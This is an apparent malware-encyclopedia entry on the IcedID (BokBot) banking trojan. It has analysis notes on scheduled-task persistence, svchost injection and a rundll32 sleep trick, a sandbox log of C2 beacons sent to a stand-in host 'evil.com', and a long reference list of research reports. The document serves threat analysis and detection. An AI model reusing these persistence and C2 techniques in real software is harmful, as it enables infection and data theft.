IcedID (Malware Family)

SYMBOL	COMMON_NAME	aka. SYNONYMS

win.icedid (Back to overview)

IcedID

aka: BokBot, IceID

Actor(s): GOLD CABIN, Lunar Spider

URLhaus

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References

2023-10-12 ⋅ Spamhaus ⋅ Spamhaus Malware Labs
Spamhaus Botnet Threat Update Q3 2023
FluBot AsyncRAT Ave Maria Cobalt Strike DCRat Havoc IcedID ISFB Nanocore RAT NjRAT QakBot Quasar RAT RecordBreaker RedLine Stealer Remcos Rhadamanthys Sliver Stealc Tofsee Vidar

2023-10-12 ⋅ Netresec ⋅ Erik Hjelmvik
Forensic Timeline of an IcedID Infection
Cobalt Strike IcedID IcedID Downloader

2023-08-28 ⋅ The DFIR Report ⋅ The DFIR Report
HTML Smuggling Leads to Domain Wide Ransomware
Cobalt Strike IcedID Nokoyawa Ransomware

2023-07-28 ⋅ Team Cymru ⋅ S2 Research Team
Inside the IcedID BackConnect Protocol (Part 2)
IcedID

2023-07-11 ⋅ Spamhaus ⋅ Spamhaus Malware Labs
Spamhaus Botnet Threat Update Q2 2023
Hydra AsyncRAT Aurora Stealer Ave Maria BumbleBee Cobalt Strike DCRat Havoc IcedID ISFB NjRAT QakBot Quasar RAT RecordBreaker RedLine Stealer Remcos Rhadamanthys Sliver Tofsee

2023-05-30 ⋅ Palo Alto Networks Unit 42 ⋅ Brad Duncan
Cold as Ice: Answers to Unit 42 Wireshark Quiz for IcedID
IcedID PhotoLoader

2023-05-22 ⋅ The DFIR Report ⋅ The DFIR Report
IcedID Macro Ends in Nokoyawa Ransomware
IcedID Nokoyawa Ransomware PhotoLoader

2023-05-21 ⋅ Github (0xThiebaut) ⋅ Maxime Thiebaut
PCAPeek
IcedID QakBot

2023-05-04 ⋅ Elastic ⋅ Cyril François
Unpacking ICEDID
IcedID PhotoLoader

2023-05-03 ⋅ Palo Alto Networks Unit 42 ⋅ Mark Lim, Daniel Raygoza, Bob Jung
Teasing the Secrets From Threat Actors: Malware Configuration Parsing at Scale
IcedID PhotoLoader

2023-05-03 ⋅ unpac.me ⋅ Sean Wilson
UnpacMe Weekly: New Version of IcedId Loader
IcedID PhotoLoader

2023-05-02 ⋅ loginsoft ⋅ System-41
IcedID Malware: Traversing Through its Various Incarnations
IcedID

2023-04-28 ⋅ DISCARDED Podcast ⋅ Joe Wise, Pim Trouerbach
Beyond Banking: IcedID Gets Forked
IcedID PhotoLoader

2023-04-21 ⋅ Sophos ⋅ Colin Cowie, Paul Jaramillo
IcedID: Defrosting a Recent Campaign Illustrating evolving tactics and shared infrastructure
IcedID PhotoLoader

2023-04-12 ⋅ Spamhaus ⋅ Spamhaus Malware Labs
Spamhaus Botnet Threat Update Q1 2023
FluBot Amadey AsyncRAT Aurora Ave Maria BumbleBee Cobalt Strike DCRat Emotet IcedID ISFB NjRAT QakBot RecordBreaker RedLine Stealer Remcos Rhadamanthys Sliver Tofsee Vidar

2023-04-12 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan
Recent IcedID (Bokbot) activity
IcedID PhotoLoader

2023-04-12 ⋅ SANS ISC ⋅ Brad Duncan
Recent IcedID (Bokbot) activity
IcedID

2023-04-11 ⋅ Twitter (@Unit42_Intel) ⋅ Unit42
Tweet on change of IcedID backconnect traffic port from 8080 to 443
IcedID

2023-04-03 ⋅ The DFIR Report ⋅ The DFIR Report
Malicious ISO File Leads to Domain Wide Ransomware
Cobalt Strike IcedID Mount Locker

2023-03-30 ⋅ loginsoft ⋅ Saharsh Agrawal
From Innocence to Malice: The OneNote Malware Campaign Uncovered
Agent Tesla AsyncRAT DOUBLEBACK Emotet Formbook IcedID NetWire RC QakBot Quasar RAT RedLine Stealer XWorm

2023-03-27 ⋅ Proofpoint ⋅ Pim Trouerbach, Kelsey Merriman, Joe Wise
Fork in the Ice: The New Era of IcedID
IcedID PHOTOFORK PHOTOLITE PhotoLoader

2023-03-20 ⋅ NVISO Labs ⋅ Maxime Thiebaut
IcedID’s VNC Backdoors: Dark Cat, Anubis & Keyhole
IcedID

2023-03-17 ⋅ Elastic ⋅ Cyril François, Daniel Stepanic
Thawing the permafrost of ICEDID Summary
IcedID PhotoLoader

2023-03-01 ⋅ Zscaler ⋅ Meghraj Nandanwar, Shatak Jain
OneNote: A Growing Threat for Malware Distribution
AsyncRAT Cobalt Strike IcedID QakBot RedLine Stealer

2023-02-28 ⋅ Intel 471 ⋅ Intel 471
Malvertising Surges to Distribute Malware
BATLOADER IcedID

2023-02-27 ⋅ PRODAFT Threat Intelligence ⋅ PRODAFT
RIG Exploit Kit: In-Depth Analysis
Dridex IcedID ISFB PureCrypter Raccoon RecordBreaker RedLine Stealer Royal Ransom Silence SmokeLoader Zloader

2023-02-24 ⋅ Team Cymru ⋅ Team Cymru
Desde Chile con Malware (From Chile with Malware)
IcedID PhotoLoader

2023-02-15 ⋅ Netresec ⋅ Erik Hjelmvik
How to Identify IcedID Network Traffic
IcedID

2023-01-20 ⋅ Blackberry ⋅ BlackBerry Research & Intelligence Team
Emotet Returns With New Methods of Evasion
Emotet IcedID

2023-01-09 ⋅ Intrinsec ⋅ Intrinsec, CTI Intrinsec
Emotet returns and deploys loaders
BumbleBee Emotet IcedID PHOTOLITE

2022-12-23 ⋅ Trendmicro ⋅ Ian Kenefick
IcedID Botnet Distributors Abuse Google PPC to Distribute Malware
IcedID

2022-12-21 ⋅ Team Cymru ⋅ S2 Research Team
Inside the IcedID BackConnect Protocol
IcedID

2022-12-18 ⋅ ZAYOTEM ⋅ Berkay DOĞAN, Dilara BEHAR, Rabia EKŞİ, Zafer Yiğithan DERECİ
IcedID Technical Analysis Report
IcedID

2022-12-15 ⋅ ISC ⋅ Brad Duncan
Google ads lead to fake software pages pushing IcedID (Bokbot)
IcedID

2022-12-06 ⋅ EuRepoC ⋅ Kerstin Zettl-Schabath, Lena Rottinger, Camille Borrett
Conti/Wizard Spider
BazarBackdoor Cobalt Strike Conti Emotet IcedID Ryuk TrickBot WIZARD SPIDER

2022-11-14 ⋅ Twitter (@embee_research) ⋅ Matthew
Twitter thread on Yara Signatures for Qakbot Encryption Routines
IcedID QakBot

2022-10-31 ⋅ Elastic ⋅ Seth Goodwin, Derek Ditch, Daniel Stepanic, Andrew Pease
ICEDIDs network infrastructure is alive and well
IcedID

2022-10-12 ⋅ Netresec ⋅ Erik Hjelmvik
IcedID BackConnect Protocol
IcedID

2022-10-07 ⋅ Team Cymru ⋅ S2 Research Team
A Visualizza into Recent IcedID Campaigns: Reconstructing Threat Actor Metrics with Pure Signal™ Recon
IcedID PhotoLoader

2022-09-07 ⋅ Google ⋅ Pierre-Marc Bureau, Google Threat Analysis Group
Initial access broker repurposing techniques in targeted attacks against Ukraine
AnchorMail Cobalt Strike IcedID

2022-09-01 ⋅ Medium michaelkoczwara ⋅ Michael Koczwara
Hunting C2/Adversaries Infrastructure with Shodan and Censys
Brute Ratel C4 Cobalt Strike Deimos GRUNT IcedID Merlin Meterpreter Nighthawk PoshC2 Sliver

2022-08-12 ⋅ SANS ISC ⋅ Brad Duncan
Monster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC and Cobalt Strike
Cobalt Strike DarkVNC IcedID

2022-08-04 ⋅ Medium walmartglobaltech ⋅ Joshua Platt, Jason Reaves
IcedID leverages PrivateLoader
IcedID PrivateLoader

2022-07-27 ⋅ SANS ISC ⋅ Brad Duncan
IcedID (Bokbot) with Dark VNC and Cobalt Strike
DarkVNC IcedID

2022-07-18 ⋅ Palo Alto Networks Unit 42 ⋅ Unit 42
Monster Libra
Valak IcedID GOLD CABIN

2022-07-17 ⋅ Resecurity ⋅ Resecurity
Shortcut-Based (LNK) Attacks Delivering Malicious Code On The Rise
AsyncRAT BumbleBee Emotet IcedID QakBot

2022-07-07 ⋅ IBM ⋅ Ole Villadsen, Charlotte Hammond, Kat Weinberger
Unprecedented Shift: The Trickbot Group is Systematically Attacking Ukraine
AnchorMail BumbleBee Cobalt Strike IcedID Meterpreter

2022-06-24 ⋅ Soc Investigation ⋅ BalaGanesh
IcedID Banking Trojan returns with new TTPS – Detection & Response
IcedID

2022-06-21 ⋅ McAfee ⋅ Lakshya Mathur
Rise of LNK (Shortcut files) Malware
BazarBackdoor Emotet IcedID QakBot

2022-05-30 ⋅ Matthieu Walter
Automatically Unpacking IcedID Stage 1 with Angr
IcedID

2022-05-19 ⋅ IBM ⋅ Charlotte Hammond, Ole Villadsen, Golo Mühr
ITG23 Crypters Highlight Cooperation Between Cybercriminal Groups
IcedID ISFB Mount Locker

2022-05-17 ⋅ Trend Micro ⋅ Trend Micro Research
Ransomware Spotlight: RansomEXX
LaZagne Cobalt Strike IcedID MimiKatz PyXie RansomEXX TrickBot

2022-05-12 ⋅ Intel 471 ⋅ Intel 471
What malware to look for if you want to prevent a ransomware attack
Conti BumbleBee Cobalt Strike IcedID Sliver

2022-05-11 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan
TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
BumbleBee Cobalt Strike IcedID PhotoLoader

2022-05-09 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team, Microsoft Threat Intelligence Center (MSTIC)
Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
AnchorDNS BlackCat BlackMatter Conti DarkSide HelloKitty Hive LockBit REvil FAKEUPDATES Griffon ATOMSILO BazarBackdoor BlackCat BlackMatter Blister Cobalt Strike Conti DarkSide Emotet FiveHands Gozi HelloKitty Hive IcedID ISFB JSSLoader LockBit LockFile Maze NightSky Pandora Phobos Phoenix Locker PhotoLoader QakBot REvil Rook Ryuk SystemBC TrickBot WastedLocker BRONZE STARLIGHT

2022-05-09 ⋅ Cybereason ⋅ Lior Rochberger
Cybereason vs. Quantum Locker Ransomware
IcedID Mount Locker

2022-05-04 ⋅ Twitter (@felixw3000) ⋅ Felix
Twitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC.
Cobalt Strike IcedID PhotoLoader

2022-04-28 ⋅ Symantec ⋅ Karthikeyan C Kasiviswanathan, Vishal Kamble
Ransomware: How Attackers are Breaching Corporate Networks
AvosLocker Conti Emotet Hive IcedID PhotoLoader QakBot TrickBot

2022-04-26 ⋅ Intel 471 ⋅ Intel 471
Conti and Emotet: A constantly destructive duo
Cobalt Strike Conti Emotet IcedID QakBot TrickBot

2022-04-25 ⋅ The DFIR Report ⋅ The DFIR Report
Quantum Ransomware
Cobalt Strike IcedID

2022-04-17 ⋅ BushidoToken Blog ⋅ BushidoToken
Lessons from the Conti Leaks
BazarBackdoor Conti Emotet IcedID Ryuk TrickBot

2022-04-14 ⋅ Bleeping Computer ⋅ Bill Toulas
Hackers target Ukrainian govt with IcedID malware, Zimbra exploits
IcedID

2022-04-14 ⋅ Cert-UA ⋅ Cert-UA
Cyberattack on Ukrainian state organizations using IcedID malware (CERT-UA#4464)
IcedID

2022-04-04 ⋅ The DFIR Report ⋅ @0xtornado, @yatinwad, @MettalicHack, @_pete_0
Stolen Images Campaign Ends in Conti Ransomware
Conti IcedID

2022-03-31 ⋅ Trellix ⋅ John Fokker, Jambul Tologonov
Conti Leaks: Examining the Panama Papers of Ransomware
LockBit Amadey Buer Conti IcedID LockBit Mailto Maze PhotoLoader Ryuk TrickBot

2022-03-29 ⋅ Threat Post ⋅ Elizabeth Montalbano
Exchange Servers Speared in IcedID Phishing Campaign
IcedID

2022-03-28 ⋅ Fortinet ⋅ James Slaughter, Val Saengphaibul, Fred Gutierrez
Spoofed Invoice Used to Drop IcedID
IcedID

2022-03-28 ⋅ Intezer ⋅ Joakim Kennedy, Ryan Robinson
New Conversation Hijacking Campaign Delivering IcedID
IcedID PhotoLoader

2022-03-28 ⋅ Bleeping Computer ⋅ Bill Toulas
Microsoft Exchange targeted for IcedID reply-chain hijacking attacks
IcedID

2022-03-23 ⋅ Secureworks ⋅ Counter Threat Unit ResearchTeam
Threat Intelligence Executive Report Volume 2022, Number 2
Conti Emotet IcedID TrickBot

2022-03-23 ⋅ Secureworks ⋅ Counter Threat Unit ResearchTeam
GOLD ULRICK Leaks Reveal Organizational Structure and Relationships
Conti Emotet IcedID TrickBot

2022-03-21 ⋅ eSentire ⋅ eSentire Threat Response Unit (TRU)
Conti Affiliate Exposed: New Domain Names, IP Addresses and Email Addresses Uncovered
HelloKitty BazarBackdoor Cobalt Strike Conti FiveHands HelloKitty IcedID

2022-03-17 ⋅ Trend Micro ⋅ Trend Micro Research
Navigating New Frontiers Trend Micro 2021 Annual Cybersecurity Report
REvil BazarBackdoor Buer IcedID QakBot REvil

2022-03-17 ⋅ Github (eln0ty) ⋅ Abdallah Elnoty
IcedID Analysis
IcedID

2022-03-09 ⋅ nikpx ⋅ xors
BokBot Technical Analysis
IcedID

2022-02-22 ⋅ eSentire ⋅ eSentire Threat Response Unit (TRU)
IcedID to Cobalt Strike In Under 20 Minutes
Cobalt Strike IcedID PhotoLoader

2022-02-10 ⋅ Cybereason ⋅ Cybereason Global SOC Team
Threat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot
Cobalt Strike Emotet IcedID QakBot

2022-01-18 ⋅ Recorded Future ⋅ Insikt Group®
2021 Adversary Infrastructure Report
BazarBackdoor Cobalt Strike Dridex IcedID QakBot TrickBot

2022-01-01 ⋅ forensicitguy ⋅ Tony Lambert
Analyzing an IcedID Loader Document
IcedID

2021-12-16 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan
How the "Contact Forms" campaign tricks people
IcedID

2021-12-03 ⋅ SANS ISC InfoSec Forums ⋅ Brad Duncan
TA551 (Shathak) pushes IcedID (Bokbot)
IcedID

2021-11-16 ⋅ IronNet ⋅ IronNet Threat Research, Morgan Demboski, Joey Fitzpatrick, Peter Rydzynski
How IronNet's Behavioral Analytics Detect REvil and Conti Ransomware
Cobalt Strike Conti IcedID REvil

2021-11-12 ⋅ Recorded Future ⋅ Insikt Group®
The Business of Fraud: Botnet Malware Dissemination
Mozi Dridex IcedID QakBot TrickBot

2021-11-04 ⋅ splunk ⋅ Splunk Threat Research Team
Detecting IcedID... Could It Be A Trickbot Copycat?
IcedID

2021-11-03 ⋅ Team Cymru ⋅ tcblogposts
Webinject Panel Administration: A Vantage Point into Multiple Threat Actor Campaigns - A Case Study on the Value of Threat Reconnaisance
DoppelDridex IcedID QakBot Zloader

2021-10-18 ⋅ The DFIR Report ⋅ The DFIR Report
IcedID to XingLocker Ransomware in 24 hours
Cobalt Strike IcedID Mount Locker

2021-10-15 ⋅ Trend Micro ⋅ Fernando Mercês
Ransomware Operators Found Using New "Franchise" Business Model
Glupteba IcedID Mount Locker

2021-09-03 ⋅ Trend Micro ⋅ Mohamad Mokbel
The State of SSL/TLS Certificate Usage in Malware C&C Communications
AdWind ostap AsyncRAT BazarBackdoor BitRAT Buer Chthonic CloudEyE Cobalt Strike DCRat Dridex FindPOS GootKit Gozi IcedID ISFB Nanocore RAT Orcus RAT PandaBanker Qadars QakBot Quasar RAT Rockloader ServHelper Shifu SManager TorrentLocker TrickBot Vawtrak Zeus Zloader

2021-08-15 ⋅ Symantec ⋅ Threat Hunter Team
The Ransomware Threat
Babuk BlackMatter DarkSide Avaddon Babuk BADHATCH BazarBackdoor BlackMatter Clop Cobalt Strike Conti DarkSide DoppelPaymer Egregor Emotet FiveHands FriedEx Hades IcedID LockBit Maze MegaCortex MimiKatz QakBot RagnarLocker REvil Ryuk TrickBot WastedLocker

2021-08-05 ⋅ Group-IB ⋅ Viktor Okorokov, Nikita Rostovcev
Prometheus TDS The key to success for Campo Loader, Hancitor, IcedID, and QBot
Prometheus Backdoor Buer campoloader Hancitor IcedID QakBot

2021-08-05 ⋅ The Record ⋅ Catalin Cimpanu
Meet Prometheus, the secret TDS behind some of today’s malware campaigns
Buer campoloader IcedID QakBot

2021-07-30 ⋅ HP ⋅ Patrick Schläpfer
Detecting TA551 domains
Valak Dridex IcedID ISFB QakBot

2021-07-26 ⋅ vmware ⋅ Quentin Fois, Pavankumar Chaudhari
Hunting IcedID and unpacking automation with Qiling
IcedID

2021-07-23 ⋅ Github (Lastline-Inc) ⋅ Quentin Fois, Pavankumar Chaudhari
YARA rules, IOCs and Scripts for extracting IcedID C2s
IcedID

2021-07-19 ⋅ The DFIR Report ⋅ The DFIR Report
IcedID and Cobalt Strike vs Antivirus
Cobalt Strike IcedID

2021-07-14 ⋅ Cerium Networks ⋅ Blumira
Threat of the Month: IcedID Malware
IcedID

2021-07-08 ⋅ vmware ⋅ Quentin Fois, Pavankumar Chaudhari
IcedID: Analysis and Detection
IcedID

2021-06-30 ⋅ Cynet ⋅ Max Malyutin
Shelob Moonlight – Spinning a Larger Web From IcedID to CONTI, a Trojan and Ransomware collaboration
Conti IcedID

2021-06-24 ⋅ SentinelOne ⋅ Marco Figueroa
Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros
IcedID

2021-06-24 ⋅ Kaspersky ⋅ Anton Kuzmenko
Malicious spam campaigns delivering banking Trojans
IcedID QakBot

2021-06-20 ⋅ The DFIR Report ⋅ The DFIR Report
From Word to Lateral Movement in 1 Hour
Cobalt Strike IcedID

2021-06-16 ⋅ Proofpoint ⋅ Selena Larson, Daniel Blackford, Garrett M. Graff
The First Step: Initial Access Leads to Ransomware
BazarBackdoor Egregor IcedID Maze QakBot REvil Ryuk TrickBot WastedLocker

2021-05-29 ⋅ Youtube (AhmedS Kasmani) ⋅ AhmedS Kasmani
Analysis of ICEID Malware Installer DLL
IcedID

2021-05-26 ⋅ Check Point ⋅ Alex Ilgayev
Melting Ice – Tracking IcedID Servers with a few simple steps
IcedID

2021-05-19 ⋅ Team Cymru ⋅ Josh Hopkins, Andy Kraus, Nick Byers
Tracking BokBot Infrastructure Mapping a Vast and Currently Active BokBot Network
IcedID

2021-05-18 ⋅ RECON INFOSEC ⋅ Andrew Cook
An Encounter With TA551/Shathak
IcedID

2021-05-17 ⋅ Telekom ⋅ Thomas Barabosch
Let’s set ice on fire: Hunting and detecting IcedID infections
IcedID

2021-05-17 ⋅ Github (telekom-security) ⋅ Deutsche Telekom Security GmbH
icedid_analysis
IcedID

2021-05-12 ⋅ The DFIR Report
Conti Ransomware
Cobalt Strike Conti IcedID

2021-05-10 ⋅ MALWATION ⋅ malwation
IcedID Malware Technical Analysis Report
IcedID

2021-04-19 ⋅ Netresec ⋅ Erik Hjelmvik
Analysing a malware PCAP with IcedID and Cobalt Strike traffic
Cobalt Strike IcedID

2021-04-17 ⋅ YouTube (Worcester DEFCON Group) ⋅ Joel Snape, Nettitude
Inside IcedID: Anatomy Of An Infostealer
IcedID

2021-04-13 ⋅ Silent Push ⋅ Martijn Grooten
Malicious infrastructure as a service
IcedID PhotoLoader QakBot

2021-04-12 ⋅ Trend Micro ⋅ Raphael Centeno, Don Ovid Ladores, Lala Manly, Junestherry Salvador, Frankylnn Uy
A Spike in BazarCall and IcedID Activity Detected in March
BazarBackdoor IcedID

2021-04-11 ⋅ 4rchibld ⋅ 4rchibld
IcedID on my neck I’m the coolest
IcedID

2021-04-10 ⋅ Youtube (AhmedS Kasmani) ⋅ AhmedS Kasmani
Malware Analysis: IcedID Banking Trojan JavaScript Dropper
IcedID

2021-04-09 ⋅ Microsoft ⋅ Emily Hacker, Justin Carroll, Microsoft 365 Defender Threat Intelligence Team
Investigating a unique “form” of email delivery for IcedID malware
IcedID

2021-04-09 ⋅ aaqeel01 ⋅ Ali Aqeel
IcedID Analysis
IcedID

2021-04-07 ⋅ Uptycs ⋅ Ashwin Vamshi, Abhijit Mohanta
IcedID campaign spotted being spiced with Excel 4 Macros
IcedID

2021-04-07 ⋅ Minerva ⋅ Minerva Labs
IcedID - A New Threat In Office Attachments
IcedID

2021-04-01 ⋅ Reversing Labs ⋅ Robert Simmons
Code Reuse Across Packers and DLL Loaders
IcedID SystemBC

2021-03-31 ⋅ Red Canary ⋅ Red Canary
2021 Threat Detection Report
Shlayer Andromeda Cobalt Strike Dridex Emotet IcedID MimiKatz QakBot TrickBot

2021-03-31 ⋅ Silent Push ⋅ Martijn Grooten
IcedID Command and Control Infrastructure
IcedID PhotoLoader

2021-03-29 ⋅ The DFIR Report ⋅ The DFIR Report
Sodinokibi (aka REvil) Ransomware
Cobalt Strike IcedID REvil

2021-03-12 ⋅ Binary Defense ⋅ James Quinn
IcedID GZIPLOADER Analysis
IcedID

2021-03-04 ⋅ F5 ⋅ Dor Nizar, Roy Moshailov
IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims
IcedID

2021-03 ⋅ Group-IB ⋅ Oleg Skulkin, Roman Rezvukhin, Semyon Rogachev
Ransomware Uncovered 2020/2021
RansomEXX BazarBackdoor Buer Clop Conti DoppelPaymer Dridex Egregor IcedID Maze PwndLocker QakBot RansomEXX REvil Ryuk SDBbot TrickBot Zloader

2021-02-26 ⋅ CrowdStrike ⋅ Eric Loui, Sergei Frankoff
Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact
DarkSide RansomEXX Griffon Carbanak Cobalt Strike DarkSide IcedID MimiKatz PyXie RansomEXX REvil

2021-02-25 ⋅ FireEye ⋅ Bryce Abdo, Brendan McKeague, Van Ta
So Unchill: Melting UNC2198 ICEDID to Ransomware Operations
MOUSEISLAND Cobalt Strike Egregor IcedID Maze SystemBC

2021-02-23 ⋅ CrowdStrike ⋅ CrowdStrike
2021 Global Threat Report
RansomEXX Amadey Anchor Avaddon BazarBackdoor Clop Cobalt Strike Conti Cutwail DanaBot DarkSide DoppelPaymer Dridex Egregor Emotet Hakbit IcedID JSOutProx KerrDown LockBit Mailto Maze MedusaLocker Mespinoza Mount Locker NedDnLoader Nemty Pay2Key PlugX Pushdo PwndLocker PyXie QakBot Quasar RAT RagnarLocker Ragnarok RansomEXX REvil Ryuk Sekhmet ShadowPad SmokeLoader Snake SUNBURST SunCrypt TEARDROP TrickBot WastedLocker Winnti Zloader KNOCKOUT SPIDER OUTLAW SPIDER RIDDLE SPIDER SOLAR SPIDER VIKING SPIDER

2021-02-03 ⋅ Mimecast, Nettitude
TA551/Shathak Threat Research
IcedID

2021-02-02 ⋅ CRONUP ⋅ Germán Fernández
De ataque con Malware a incidente de Ransomware
Avaddon BazarBackdoor Buer Clop Cobalt Strike Conti DanaBot Dharma Dridex Egregor Emotet Empire Downloader FriedEx GootKit IcedID MegaCortex Nemty Phorpiex PwndLocker PyXie QakBot RansomEXX REvil Ryuk SDBbot SmokeLoader TrickBot Zloader

2021-01-19 ⋅ Palo Alto Networks Unit 42 ⋅ Brad Duncan
Wireshark Tutorial: Examining Emotet Infection Traffic
Emotet GootKit IcedID QakBot TrickBot

2021-01-19 ⋅ Medium elis531989 ⋅ Eli Salem
Funtastic Packers And Where To Find Them
Get2 IcedID QakBot

2021-01-18 ⋅ tccontre Blog ⋅ tcontre
Extracting Shellcode in ICEID .PNG Steganography
IcedID

2021-01-09 ⋅ Marco Ramilli's Blog ⋅ Marco Ramilli
Command and Control Traffic Patterns
ostap LaZagne Agent Tesla Azorult Buer Cobalt Strike DanaBot DarkComet Dridex Emotet Formbook IcedID ISFB NetWire RC PlugX Quasar RAT SmokeLoader TrickBot

2021-01-07 ⋅ Palo Alto Networks Unit 42 ⋅ Brad Duncan
TA551: Email Attack Campaign Switches from Valak to IcedID
IcedID

2021 ⋅ AWAKE ⋅ Awake Security
Breaking the Ice: Detecting IcedID and Cobalt Strike Beacon with Network Detection and Response (NDR)
Cobalt Strike IcedID PhotoLoader

2020-12-10 ⋅ NRI SECURE ⋅ NeoSOC
マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説
IcedID

2020-12-09 ⋅ Cisco ⋅ David Liebenberg, Caitlin Huey
Quarterly Report: Incident Response trends from Fall 2020
Cobalt Strike IcedID Maze RansomEXX Ryuk

2020-12-09 ⋅ Microsoft ⋅ Microsoft 365 Defender Research Team
EDR in block mode stops IcedID cold
IcedID

2020-12-02 ⋅ CyberInt ⋅ Cyberint Research
IcedID Stealer Man-in-the-browser Banking Trojan
IcedID

2020-11-26 ⋅ Cybereason ⋅ Lior Rochberger, Cybereason Nocturnus
Cybereason vs. Egregor Ransomware
Cobalt Strike Egregor IcedID ISFB QakBot

2020-09-29 ⋅ Microsoft ⋅ Microsoft
Microsoft Digital Defense Report
Emotet IcedID Mailto Maze QakBot REvil RobinHood TrickBot

2020-08-16 ⋅ kienmanowar Blog ⋅ m4n0w4r
Manual Unpacking IcedID Write-up
IcedID

2020-08-12 ⋅ Juniper ⋅ Paul Kimayong
IcedID Campaign Strikes Back
IcedID

2020-08-10 ⋅ tccontre Blog ⋅ tccontre
Learning From ICEID loader - Including its Steganography Payload Parsing
IcedID

2020-07-30 ⋅ Spamhaus ⋅ Spamhaus Malware Labs
Spamhaus Botnet Threat Update Q2 2020
AdWind Agent Tesla Arkei Stealer AsyncRAT Ave Maria Azorult DanaBot Emotet IcedID ISFB KPOT Stealer Loki Password Stealer (PWS) Nanocore RAT NetWire RC NjRAT Pony Raccoon RedLine Stealer Remcos Zloader

2020-07-01 ⋅ Cisco Talos ⋅ Nick Biasini, Edmund Brumaghin, Mariano Graziano
Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks
Valak IcedID ISFB MyKings Spreader

2020-06-22 ⋅ zero2auto ⋅ Daniel Bunce
Unpacking Visual Basic Packers – IcedID
IcedID

2020-06-18 ⋅ Juniper ⋅ Paul Kimayong
COVID-19 and FMLA Campaigns used to install new IcedID banking malware
IcedID

2020-06-17 ⋅ Github (f0wl) ⋅ Marius Genheimer
deICEr: A Go tool for extracting config from IcedID second stage Loaders
IcedID

2020-05-29 ⋅ Group-IB ⋅ Ivan Pisarev
IcedID: When ice burns through bank accounts
IcedID

2020-03-04 ⋅ CrowdStrike ⋅ CrowdStrike
2020 CrowdStrike Global Threat Report
